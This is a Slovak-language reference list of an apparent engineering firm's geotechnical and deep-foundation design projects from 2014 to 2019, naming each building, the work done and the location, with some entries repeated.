Popis práce: Hlbinné zakladanie na pilótach, Tendrová dokumentácia
Miesto práce:  Prievidza

Popis stavby: BORY HOME III, DSP- dokumentácia pre stavebné povolenie
Popis práce: SO 101 –  objekt A1, SO 108 –  objekt D2, SO 102 –  objekt A2, SO 103 –  objekt B1
SO 104 –  objekt B2, SO 105 –  objekt B3, SO 106 –  objekt C1, SO 107 –  objekt D1

Miesto práce: Bratislava

Popis stavby: Obytný súbor Kubrá – Dolná kopanica,
Popis práce: Statické zaťažovacie skúšky podložia a geotechnických konštrukcií, konzultácie a dozor geotechnika

Miesto práce: Kubrá

Popis stavby: POLYFUNKČNÝ SÚBOR EUROVEA 2, Pribinova ulica, Bratislava, realizačný projekt, Špeciálne zakladanie a geotechnika
Popis práce: STAVBA č.01 – PODZEMNÁ GARÁŽ; SO 301- HLAVNÝ OBJEKT – BYTOVÝ DOM/NÁBREŽIE; 601- HLAVNÝ OBJEKT – ADMINISTRATÍVNA BUDOVA 2
E1.101.2.1 GTN Zakladanie

Miesto práce: Bratislava

Popis stavby: POLYFUNKČNÝ SÚBOR KLINGERKA I, Bratislava, realizačný projekt, Špeciálne zakladanie a geotechnika
Popis práce:SO 01 Veža byty – doplnenie mikropilót pilóty D31, SO 01 Veža byty – doplnenie mikropilót, SO 02 Veža administratíva

Miesto práce: Bratislava

Popis stavby: Kongresovo-administratívne centrum, Pribinova ul.  Bratislava,  projekt pre stavebné povolenie,
Popis práce:

Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí

Obchodný súbor:  Zabezpečenie stavebnej jamy, špeciálne zakladanie

Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Bratislava

Popis stavby: Realizačný projekt zakladania BD
Popis práce:

Dokumentácia realizácie stavby

Miesto práce: Košice

Popis stavby: Realizačný projekt zakladania BD
Popis práce:

Objekt : S.01 Administratívna budova – vstavok

Časť : Špeciálne zakladanie – Mikropilóty

Miesto práce: Malý Šariš

Popis stavby: Realizačný projekt zakladania BD
Popis práce:

Stupeň: Zmena stavby pred dokončením

Zabezpečenie stavebnej jamy,

Objekt: Predvýkop a zabezpečenie stavebnej jamy

Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Bratislava

Popis stavby: Bytový dom Eden, Poprad,

Popis práce: Projekt zabezpečenia stavebnej jamy – realizačná dokumentácia

Miesto práce: Poprad

Popis stavby: Novostavba objektu obchodu a služieb

Popis práce: Projekt zabezpečenia stavebnej jamy – realizačná dokumentácia

Miesto práce:Vysoké Tatry – Starý Smokovec

Popis stavby: Navýšenie hrádze severozápadného cípu skládky odpadov

Popis práce: Projekt navýšenia, stabilitné posúdenie – realizačná dokumentácia

Miesto práce: Senec

2018

Popis stavby: SO – 01 -HALA A, HALA B
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Ivanka pri Dunaji, Farná

Popis stavby: LOGISTICKO SKLADOVACÍ OBJEKT SO – 100
Popis práce: Úprava podložia
Miesto práce:  Lužianky
Popis stavby: HANGÁR KUCHYŇA
Popis práce: Projekt hĺbkového zakladania a podláh
Miesto práce:  Kuchyňa
Popis stavby: KOMPLETNÁ REKONŠTRUKCIA VEDENÍ Č. 7717, 7718
Popis práce: ZABEZPEČENIE CESTY I/18 PROTI PADANIU SKÁL
Miesto práce:  Strečno
Popis stavby: ZMENA STAVBY PRED DOKONČENÍM
Popis práce: projektová dokumentácia
Miesto práce:  Žilina
Popis stavby: LAKOVŇA
Popis práce: hĺbkové založenie objektu, podlahová doska objektu technologické kanáliky a šachty
Miesto práce:  Nitra
Popis stavby: SO.01.1 – Administratívna budova HELSKE
Popis práce: hĺbkové založenie objektu
Miesto práce:  Levoča

2017

Popis stavby: I. ETAPA
Popis práce: Tendrová dokumentácia paženia a tesnenia stavebnej jamy
Miesto práce:  Žilina
Popis stavby:
SO01 – Rozšíření skladu surovin 1
SO02 – Rozšíření skladu hotové výroby
SO03 – Rozšíření skladovací haly
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Svitavy, Česká republika
Popis stavby:
výrobná hala „G“ Slovaktual Pravenec
objekt SO -101 – Výrobný monoblok
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Pravenec
Popis stavby: obytný súbor, Bratislava – Dúbravka
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby:
SO – 01 Bezručova 3
SO – 02 Podzemná garáž Lomonosovova
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Bratislava

2019

Popis stavby: SO – 101, SO – 102, SO – 103,, SO – 104, SO – 105
Popis práce: Projekt hĺbkového zakladania, DSP
Miesto práce: Trnava

Popis stavby: paženie stavebnej jamy
Popis práce: Projekt zabezpečenia stabvebnej jemy
Miesto práce: Bratislava – Slávičie údolie

Popis stavby: Diaľnica D1 Hubová – Ivachnová SO 220
Popis práce: posúdenie únosnosti podložia pod podperné konštrukcie v úseku Most na vetve L- B1 križovatka Likavka v KM 0,477
Miesto práce:  Hubová – Ivachnová

Popis stavby: POLYFUNKČNÝ DOM – RUDLOVSKÝ POTOK
Popis práce: Pilótové zakladanie
Miesto práce:  Banská Bystrica

Popis stavby: Dokumentácia špeciálneho zakladania v stupni: Realizačný projekt
Popis práce:  Hĺbkové zakladanie časť A
Hĺbkové zakladanie časť B

Miesto práce: Žilina

Popis stavby: Bytový dom F , G, H
Popis práce: Bytový dom F, G, H s polyfunkčným parterom – projekt pilótového zakladania
Miesto práce:  Liptovský Mikuláš, k.ú. Demänová

Popis stavby: BROSE – ADMINISTRATÍVNA A VÝROBNÁ HALA – FÁZA III.
Popis práce: Hlbinné zakladanie na pilótach, Tendrová dokumentácia
Miesto práce:  Prievidza

Popis stavby: BORY HOME III, DSP- dokumentácia pre stavebné povolenie
Popis práce: SO 101 –  objekt A1, SO 108 –  objekt D2, SO 102 –  objekt A2, SO 103 –  objekt B1
SO 104 –  objekt B2, SO 105 –  objekt B3, SO 106 –  objekt C1, SO 107 –  objekt D1

Miesto práce: Bratislava

Popis stavby: Obytný súbor Kubrá – Dolná kopanica,
Popis práce: Statické zaťažovacie skúšky podložia a geotechnických konštrukcií, konzultácie a dozor geotechnika

Miesto práce: Kubrá

Popis stavby: POLYFUNKČNÝ SÚBOR EUROVEA 2, Pribinova ulica, Bratislava, realizačný projekt, Špeciálne zakladanie a geotechnika
Popis práce: STAVBA č.01 – PODZEMNÁ GARÁŽ; SO 301- HLAVNÝ OBJEKT – BYTOVÝ DOM/NÁBREŽIE; 601- HLAVNÝ OBJEKT – ADMINISTRATÍVNA BUDOVA 2
E1.101.2.1 GTN Zakladanie

Miesto práce: Bratislava

Popis stavby: POLYFUNKČNÝ SÚBOR KLINGERKA I, Bratislava, realizačný projekt, Špeciálne zakladanie a geotechnika
Popis práce:SO 01 Veža byty – doplnenie mikropilót pilóty D31, SO 01 Veža byty – doplnenie mikropilót, SO 02 Veža administratíva

Miesto práce: Bratislava

Popis stavby: Kongresovo-administratívne centrum, Pribinova ul.  Bratislava,  projekt pre stavebné povolenie,
Popis práce:

Časť projektovej dokumentácie: Dokumentácia stavebných objektov a inžinierskych sietí

Obchodný súbor:  Zabezpečenie stavebnej jamy, špeciálne zakladanie

Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Bratislava

Popis stavby: Realizačný projekt zakladania BD
Popis práce:

Dokumentácia realizácie stavby

Miesto práce: Košice

Popis stavby: Realizačný projekt zakladania BD
Popis práce:

Objekt : S.01 Administratívna budova – vstavok

Časť : Špeciálne zakladanie – Mikropilóty

Miesto práce: Malý Šariš

Popis stavby: Realizačný projekt zakladania BD
Popis práce:

Stupeň: Zmena stavby pred dokončením

Zabezpečenie stavebnej jamy,

Objekt: Predvýkop a zabezpečenie stavebnej jamy

Profesný diel: Špeciálne zakladanie a geotechnika

Miesto práce: Bratislava

Popis stavby: Bytový dom Eden, Poprad,

Popis práce: Projekt zabezpečenia stavebnej jamy – realizačná dokumentácia

Miesto práce: Poprad

Popis stavby: Novostavba objektu obchodu a služieb

Popis práce: Projekt zabezpečenia stavebnej jamy – realizačná dokumentácia

Miesto práce:Vysoké Tatry – Starý Smokovec

Popis stavby: Navýšenie hrádze severozápadného cípu skládky odpadov

Popis práce: Projekt navýšenia, stabilitné posúdenie – realizačná dokumentácia

Miesto práce: Senec

2018

Popis stavby: SO – 01 -HALA A, HALA B
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Ivanka pri Dunaji, Farná

Popis stavby: LOGISTICKO SKLADOVACÍ OBJEKT SO – 100
Popis práce: Úprava podložia
Miesto práce:  Lužianky
Popis stavby: HANGÁR KUCHYŇA
Popis práce: Projekt hĺbkového zakladania a podláh
Miesto práce:  Kuchyňa
Popis stavby: KOMPLETNÁ REKONŠTRUKCIA VEDENÍ Č. 7717, 7718
Popis práce: ZABEZPEČENIE CESTY I/18 PROTI PADANIU SKÁL
Miesto práce:  Strečno
Popis stavby: ZMENA STAVBY PRED DOKONČENÍM
Popis práce: projektová dokumentácia
Miesto práce:  Žilina
Popis stavby: LAKOVŇA
Popis práce: hĺbkové založenie objektu, podlahová doska objektu technologické kanáliky a šachty
Miesto práce:  Nitra
Popis stavby: SO.01.1 – Administratívna budova HELSKE
Popis práce: hĺbkové založenie objektu
Miesto práce:  Levoča

2017

Popis stavby: I. ETAPA
Popis práce: Tendrová dokumentácia paženia a tesnenia stavebnej jamy
Miesto práce:  Žilina
Popis stavby:
SO01 – Rozšíření skladu surovin 1
SO02 – Rozšíření skladu hotové výroby
SO03 – Rozšíření skladovací haly
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Svitavy, Česká republika
Popis stavby:
výrobná hala „G“ Slovaktual Pravenec
objekt SO -101 – Výrobný monoblok
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Pravenec
Popis stavby: obytný súbor, Bratislava – Dúbravka
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby:
SO – 01 Bezručova 3
SO – 02 Podzemná garáž Lomonosovova
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Bratislava

2016

Popis stavby: SO – 02 VÝROBNÁ HALA – 2.ETAPA
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  PREŠOV ZÁBORSKE

Popis stavby: SO – 02  OBCHODNÁ GALÉRIA
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Banská Štiavnica

Popis stavby: SO 101 PRÍSTAVBA SKLADU
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Prievidza

Popis stavby: SO 01 – II. ETAPA
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Levice
Popis stavby: Strečno – hala DC2 P3
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Strečno

Popis stavby:
SO 01 – Distribučné centrum
SO 02 -Skladová hala
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Žilina

Popis stavby:SKLAD HOTOVEJ VÝROBY TUBEX SLOVAKIA s.r.o.
Popis práce: SO 01 Prístavba skladu hotovej výroby
Miesto práce:  Žarnovica
Popis stavby: S023 VÝROBNÁ A MONTÁŽNA HALA – SAS
Popis práce:
Miesto práce:  Devínska Nová Ves

Popis stavby:
SO 105 Podzmená garáž 5
SO 115 Bytový dom 5
Popis práce:
Miesto práce:  Bratislava – Malé Krasňany

Popis stavby: D1 Ivachnová-Hubová SO 215
Popis práce:posúdenie únosnosti podložia pod podperné konštrukcie v rade 7-13
Miesto práce:  Ivachnová, Hubová
Popis stavby: km 12,8 na ceste I/18 SO 218-00
Popis práce: posúdenie stability svahu a únosnosti
Miesto práce:  Ivachnová, Hubová
Popis stavby: SO 01 Hlavný objekt
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Bánovce nad Bebravou

Popis stavby: Stavba DC112 DP3 Strečno
Popis práce:
Miesto práce:  Strečno

Popis stavby: Blok-1
Popis práce: Projekt hĺbkového zakladania
Miesto práce:  Nitra
Popis stavby: Priemyselný park Presskam
Popis práce: Skladovo administratívna hala-Presskam Development 2
Miesto práce:  Devínska Nová Ves
Popis stavby: SO 01, SO 02
Popis práce: Projekt hĺbkového založenia
Miesto práce:  Krásno nad Kysucou
Popis stavby: HALA 07
Popis práce: Projekt hĺbkového založenia
Miesto práce:  Bratislava – Petržalka
Popis stavby: Budova pre obchod a služby
Popis práce: Projekt hĺbkového založenia
Miesto práce:  Krásno nad Kysucou
Popis stavby: Vaillant III. – Rozšírenie výrobného areálu Trenčianske Stankovce
SO 03 Prístavba k výrobnej hale-fáza III.
SO 03/a Výrobná hala
SO 03/b Administratívna prístavba
Popis práce: Projekt hĺbkového založenia
Miesto práce:  Trenčianske Stankovce
Popis stavby: Logistické centrum Goodman
SO 19 Oporné múry
Popis práce: Projekt hĺbkového založenia
Miesto práce:  Senec
Popis stavby: Logistické centrum Goodman
objekt SO 02.1 Hala D
Popis práce: Projekt hĺbkového založenia
Miesto práce:  Senec
Popis stavby: VÝROBNĚ – SKLADOVACÍ HALA f. DOR, s.r.o
Popis práce: Projekt hĺbkového založenia
Miesto práce:  Považské Podhradie
Popis stavby: VÝROBNÝ ZÁVOD BONFIGLIOLI POVAŽSKÁ BYSTRICA III. Etapa
objekt SO 01
Popis práce: Projekt hĺbkového založenia
Miesto práce:  Považská Bystrica
Popis stavby: LOGISTICKÉ CENTRUM GOODMAN – SENEC
Popis práce: Projekt hĺbkového založenia
Miesto práce:  Senec
Popis stavby: SO 103 Energoblok
Popis práce: Projekt hĺbkového založenia
Miesto práce:  Svitavy
Popis stavby: Viacúčelová športová hala
SO 01 Športová hala
Popis práce:
Miesto práce:  Bratislava
Popis stavby:
SO – 01 Polyfunkčný dom ORION
SO – 02 Polyfunkčný dom MIRA
SO – 03 Polyfunkčný dom CETI
Popis práce: Projekt hĺbkového založenia
Miesto práce:  Banská Bystrica

Popis stavby: Stabilizácia cestného telesa
Popis práce:
realizačná dokumentácia
dopracovanie PD
Miesto práce:  Zuberec – Huty

Popis stavby: D1 Ivachnová Hubová km 12,8 na ceste I/18
Popis práce: SO 218-00 posúdenie stability svahu a únosnosti podložia pod podperné konštrukcie
Miesto práce:  Ivachnová – Hubová

Popis stavby: stabilizácia cestného telesa v súbehu s vodným tokom
Popis práce: projektová dokumentácia DSP
Miesto práce:  Vitanová
Popis stavby: SO 01 new Delivery
Popis práce: projekt hĺbkového založenia
Miesto práce:  Nitra
Popis stavby:
SO 02 Vlastný objekt – Retail A
SO 02 Vlastný objekt – Retail B
Popis práce: projekt hĺbkového založenia
Miesto práce:  Trnava
Popis stavby: SO 10 Podzemná garáž
Popis práce:
projekt hĺbkového založenia
stabilizácia stavebnej jamy
Miesto práce:  Bratislava
Popis stavby: NADSTAVBA POŽIARNEJ ZBROJNICE – 9 b.j. v Krásne nad Kysucou
Popis práce: projekt hĺbkového založenia
Miesto práce:  Krásno nad Kysucou
Popis stavby: SO 101 hala
Popis práce: projekt hĺbkového založenia
Miesto práce:  Kostolné Kračany
Popis stavby: SO 10 Podzemná garáž
Popis práce: projekt hĺbkového založenia
Miesto práce:  Bratislava
Popis stavby:
SO 67.1 – HALA E – VÝROBNÁ HALA,
SO 68 – PRÍSTAVBA SKLADU HOTOVÝCH VÝROBKOV,
SO 68a – PREPOJENIE HALY D a E1
Popis práce: projekt hĺbkového založenia
Miesto práce:  Sereď
Popis stavby: VÝROBNÁ A ADMINISTRATÍVNA HALA – BROSE
Popis práce: projekt hĺbkového založenia
Miesto práce:  Prievidza
Popis stavby: SO – 101 výrobná hala + AB
Popis práce: projekt hĺbkového založenia
Miesto práce:  Považská Bystrica
Popis stavby:
SO – 105 Podzemná garáž 5
SO – 115 Bytový dom 5
Popis práce: projekt hĺbkového založenia
Miesto práce:  Bratislava
Popis stavby:
SO 105 Bytový dom s vybavenosťou (objekt D, sekcie D1-D5)
SO 114 Podzemná garáž PG2
Popis práce: projekt hĺbkového založenia
Miesto práce:  Bratislava
Popis stavby: Prístavba administratívy a certifikačného pracoviska
Popis práce: projekt hĺbkového založenia
Miesto práce:  Ostrava
Popis stavby: objekt SO – 01 Výrobná hala
Popis práce: projekt hĺbkového založenia
Miesto práce:  Hozelec
Popis stavby: 3. etapa
Popis práce: projekt hĺbkového založenia
Miesto práce:  Ilava
Popis stavby: SO 01
Popis práce: projekt hĺbkového založenia
Miesto práce:  Žilina

2015

Popis stavby: Kapitulská ul. 19
Popis práce: Návrh stabilizovania stavebnej jamy
Miesto práce:  Trnava

Popis stavby: Kapitulská ul. 19
Popis práce: Zhodnotenie aktuálneho stavu stavebnej jamy
Miesto práce:  Trnava

Popis stavby: SO.02 Apartmánový dom MALÁ HORA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Martin
Popis stavby: SO 101.2-B NÁKUPNÁ GALÉRIA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Košice
Popis stavby:
SO 105 Bytový dom s vybavenosťou ( objekt D, sekcie D1-D5 ),
SO 114 Podzemná garáž PG2
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratiskava, Dúbravka
Popis stavby:
SO 01a SKLADOVÁ HALA
SO 01b ADMINISTRATÍVNY BLOK
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Ružomberok

Popis stavby: SO 01 HLAVNÝ OBJEKT
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Komárno

Popis stavby: SO 02 LOGISTICKÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Kysucké Nové Mesto
Popis stavby: Technometal Bytča_II etapa
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bytča
Popis stavby: SO 01 LOGISTICKÉ CENTRUM
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Trenčianske Stankovce
Popis stavby: Rozšírenie skladu hotových výrobkov
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Skalica
Popis stavby: Prístavba skladových a administratívnych objektov
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Drietoma
Popis stavby: SO 01 HALA ZG1
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Žilina
Popis stavby: S.O 01 – ADMINISTRATÍVNO-PREVÁDZKOVÝ OBJEKT
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Považská Bystrica
Popis stavby: SO 01 HALA ZG1
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Žilina
Popis stavby: SO 202 – HALA VOD1 – JEDNOTKA A
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Voderady
Popis stavby: Polyfunkčný objekt SO 01.1
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava

Popis stavby:
SO 101 – OBCHODNÉ CENTRUM
SO 103 – REKLAMNÝ PÚTAČ RZ1
SO 103 – REKLAMNÝ PÚTAČ RZ2

Miesto práce:  Zlaté Moravce

Popis stavby: Novostavba bytového domu
Popis práce:
Miesto práce:  Trnava

Popis stavby: Novostavba bytového domu
Popis práce:
Miesto práce:  Trnava

Popis stavby: SO 810
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Jaslovské Bohunice
Popis stavby: SO 01 PRIEMYSELNÁ VÝROBNÁ HALA ADMINISTRATÍVNOU ČASŤOU
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Nová Dubnica
Popis stavby:
priemyselná výroba Sereď
SO 312.02 – Logistická hala
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Sereď
Popis stavby: SO – 12 VÝVOJOVÉ CENTRUM
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Zvolen
Popis stavby: SKLAD HOTOVEJ VÝROBY VETROPACK NEMŠOVÁ
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Nemšová
Popis stavby: SO 101.1 – PREVÁDZKOVO-SKLADOVÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Kysucké Nové Mesto
Popis stavby: PALETOVÝ REGÁLOVÝ SKLAD UNIPHARMA BOJNICE
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bojnice
Popis stavby: SKLAD PALIET
Popis práce: projekt hĺbkového zakladania
Miesto práce:  ZVOLEN
Popis stavby: SO 01 VÝROBNO SKLADOVÁ HALA 2
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Devínska Nová Ves
Popis stavby: D3 Svrčinovec –Skalité SO 240-00 Most Markov
Popis práce: posudok na stavbu
Miesto práce:  Svrčinovec
Popis stavby: SKLAD UHT MLIEKA, Tatranská mliekareň a.s., KEŽMAROK
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Kežmarok
Popis stavby: SO 01 Administratívna budova a skladovo – predajná hala
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: SO 401 SKLADOVÁ HALA IV
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Nitra
Popis stavby: SO 520 SKLADOVÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Nitra
Popis stavby: SO A – BYTOVÝ DOM
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: MÝTNA – RADLINSKÉHO
Popis práce: podchytenie objektu
Miesto práce:  Bratislava
Popis stavby: MÝTNA – RADLINSKÉHO
Popis práce: projekt monitoringu
Miesto práce:  Bratislava
Popis stavby: MÝTNA – RADLINSKÉHO
Popis práce: Ochrana stavebnej jamy
Miesto práce:  Bratislava
Popis stavby:
SO 312.02 – Logistická hala
priemyselná výroba Sereď
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Sereď
Popis stavby: OBJ. HALA LANÁRNE
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Hlohovec
Popis stavby: SO 04 Bytový dom 4
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Banská Bystrica

Popis stavby: SO 201b Bytový dom 02
Popis práce:
Miesto práce:  Bratislava

Popis stavby: SO 202 VÝROBNÁ A SKLADOVACIA – 2. ETAPA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Senica
Popis stavby: SO 04, SO 05
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Senica
Popis stavby:
SO 106 Bytový dom s vybavenosťou ( objekt C, sekcie C1-C4 ),
SO 114 Podzemná garáž PG2
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava, Dúbravka
Popis stavby: I/18 ĽUBOCHŇA, ČASŤ KORBELKA, KM 505,600-ZOSUV – I., II., III.ETAPA
Popis práce: Realizačná dokumentácia
Miesto práce:  Ľubochňa
Popis stavby:
SOH 001 VÝROBNO-SKLADOVÁ HALA
SOH 002 ADMINISTRATÍVNA BUDOVA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Krásno nad Kysucou
Popis stavby: SO201.1 – 201 MONTÁŽNO SKLADOVÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Devínska Nová Ves

2014

Popis stavby: TESCO SO 01 OBJEKT PREDAJNE
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Kúty
Popis stavby: TESCO SO 01 OBJEKT PREDAJNE
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Kúty
Popis stavby:
ČASŤ L- PODZEMNÁ PARKOVACIA GARÁŽ
SO 2.L.10: PODZEMNÁ GARÁŽ
Popis práce: Založenie žeriavov Ž1, Ž2
Miesto práce:  Bratislava
Popis stavby:
ČASŤ L- PODZEMNÁ PARKOVACIA GARÁŽ
SO 2.L.10: PODZEMNÁ GARÁŽ
Popis práce: Paženie stavebnej jamy
Miesto práce:  Bratislava
Popis stavby: ZABEZPEČOVACIE ZÁCHRANNÉ PRÁCE NA CESTE III/01175 V ÚSEKU TERCHOVÁ-VRÁTNA DOLINA
Popis práce: Dielenská dokumentácia
Miesto práce:  Terchová – Vrátna dolina
Popis stavby: STABILIZÁCIA ZOSUVU KOŠICE-KRÁSNA N. HORNÁDOM- DSRS
Popis práce: Dokumentácia skutočného vyhotovenia
Miesto práce:  Košice
Popis stavby: STABILIZÁCIA ZOSUVU KOŠICE-SLIVNÍK – DSRS
Popis práce: Dokumentácia skutočného vyhotovenia
Miesto práce:  Košice
Popis stavby: LOGISTICKÁ HALA SCHNELLECKE 3 – DNV
Popis práce: Realizačná dokumentácia na hĺbkové založenie stavby
Miesto práce:  Košice

Popis stavby: JENEČ-Obchodno-priemyslová zóna „R6 park“ Areál haly H(DC1)
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Jeneč pri Prahe

Popis stavby:
Popis práce: Realizačná dokumentácia na zabezpečenie svahov a odvodnenia územia
Miesto práce:  Bratislava – Devín

Popis stavby: NOVOSTAVBA BYTOVEJ BUDOVY -APARTMÁNOVÝ DOM „MALÁ HORA“
Popis práce: Realizačná dokumentácia na hĺbkové založenie stavby
Miesto práce:  Martin

Popis stavby: SO 001.1 – PRÍPRAVA ÚZEMIA A HTU
Popis práce: PAŽENIE OPORNÉHO MÚRU OM2
Miesto práce:  Pravenec
Popis stavby: SO 01 Prenajímatelný priestor
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Poprad
Popis stavby: DEVÍN – ZÁHRADY
Popis práce: zabezpečenie svahov a odvodnenia územia
Miesto práce:  Bratislava Devín
Popis stavby: a novostavba parkovacieho domu SO 101a – PRÍSTAVBA OC KAUFLAND
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Topoľčany
Popis stavby: ACTIVE ZONE POPRAD – športové centrum, SO 01
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Poprad
Popis stavby: POLYFUNKČNÝ OBYTNÝ SÚBOR DÚBRAVČICE – východ, II. etapa, Bratislava, Dúbravka
Popis práce:
projekt hĺbkového zakladania
stabilizácia stavebnej jamy
Miesto práce:  Bratislava – Dúbravka

Popis stavby: SO 01 – OBJEKT FORUM / SHOPPING CENTER
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Poprad

Popis stavby: SO-13 LOGISTICKÉ CENTRUM
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Zvolen
Popis stavby: STABILIZÁCIA ZOSUVU KOŠICE – Krásna nad Hornádom
Popis práce: projekt technického riešenia stabilizácie svahu
Miesto práce:  Košice

Popis stavby: STABILIZÁCIA ZOSUVU KOŠICE – Krásna nad Hornádom
Popis práce: projekt technického riešenia stabilizácie svahu
Miesto práce:  Košice

Popis stavby: Polyfunkčný súbor „Tatra Residence“ obch. centrum a objekt služieb, 1.etapa – polyf. sektor
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava

Popis stavby: SO 002 021 Stavebná jama
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: I. etapa výstavby“- Bratislava OMNIA“
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Bratislava
Popis stavby: I/12 ČIERNE-ZOSUV, KM 6,644 69-KM 6,804 69, SO 201 – Stabilizácia svahu po zosuve
Popis práce: projekt stabilizácie svahu
Miesto práce:  Čierne

Popis stavby: Projektová dokumentácia na zmenu DÚR na akciu „Záhradky-viladomy“,
Popis práce: zabezpečenie svahov a odvodnenie územia pre IBV
Miesto práce:  Devín

Popis stavby: Hĺbkové založenie stavby „DNV-Presskam SO.01 – SKLADOVÁ HALA“
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Devínska Nová Ves
Popis stavby: SO M004 -VÝROBNÁ HALA BŔZD
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Gbeľany, Žilina
Popis stavby: STABILIZÁCIA ZOSUVU KOŠICE-SLIVNÍK
Popis práce: projekt hĺbkového zakladania
Miesto práce:  KOŠICE
Popis stavby: STABILIZÁCIA ZOSUVU KRÁSNA NAD HORNÁDOM
Popis práce: projektová dokumentácia
Miesto práce:  Košice, Krásna nad Hornádom
Popis stavby: Polyfunkčný objekt S Z A X O N
Popis práce: projekt zabezpečenia stavebnej jamy
Miesto práce:  Kráľovský Chlmec
Popis stavby: Tecoplast PM Slovakia – Prístavba skladu, SO 001 SKLADOVÁ HALA
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Myjava
Popis stavby: CAMPUS NAMESTOVO – FÁZA 3, rozšírenie SO 02- SKLADOVÁ HALA,
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Námestovo
Popis stavby: VÝROBNO-SKLADOVÁ HALA, SO 01 PP Nitra – Sever s.r.o., NITRA INVEST
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Nitra
Popis stavby: TRÉNINGOVÁ HOKEJOVÁ HALA, Objekt SO. 101
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Piešťany
Popis stavby: ACTIVE ZONE Poprad – športové centrum
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Poprad
Popis stavby: OBCHODNÉ CENTRUM FORUM, POPRAD, SO 01 – objekt Forum / Shopping Center
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Poprad
Popis stavby: TESCO – POPRAD-FÁZA III.-NÁJOMNÁ JEDNOTKA, SO 01 – Prenajímatelný priestor,
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Poprad
Popis stavby: SLOVAKTUAL PRAVENEC, SO 101 – výrobný monoblok
Popis práce: projekt hĺbkového zakladania
Miesto práce:  Pravenec
